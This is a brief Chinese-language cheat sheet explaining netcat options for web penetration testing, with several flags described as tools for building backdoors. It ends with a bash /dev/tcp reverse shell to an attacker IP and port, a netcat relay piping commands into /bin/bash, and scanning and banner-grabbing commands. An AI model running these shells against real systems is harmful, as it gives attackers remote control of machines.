作为web渗透中的扛把子工具，我们必须掌握灵活使用它，下面我们来了解一下它的命令吧！

netcat

-d

表示脱离命令窗口，在后台运行，常用于后门建立过程

假设监听了一个端口，但是关闭了那个cmd窗口那么nc就不会监听了，加入了-d就会在后台运行

-e

执行某个程序，常用于后门建立过程(cmd. exe、/bin/bash)

-G gateway

设置网关，常用于突破内网限制

-g num

路由跳数

-i sec

设置发送每一行数据的时间间隔(以秒计算)

-l

设置netcat处于监听状太等待连接

-L

设置netcat处于昕状态等待连接，当客户端端口，服务端依旧回到等待状

-n

设置netcar只扫描ip不进行DNS解析

-o file

设置传输十六进制的数据

-p port

设置本地监听的端口了

-r

设置netcat随机化的端口号

-s addr

设置netcat源地址(用于端口扫描上)

-t

回复telnet的请求数据包

-u

设置netcat使用UDP模式(默认是使用TCP协议)

-v

显示详细信息

-w secs

设置连接超时秒数

-z

设置扫描模式，表示发送的数据包中不包含任何payload

服务器(linux)没有netcat，使用bash -i >& /dev/tcp/攻击者ip/攻击者port 0>&1 反弹shell(0表示输入，1表示输出)

nc -nvz ip port扫描端口开放情况

echo "" | nc -vn ip port    显示banner信息

客户端开两个端口，一个输入一个输出

服务器端nc ip 入port | /bin/bash | nc ip 出port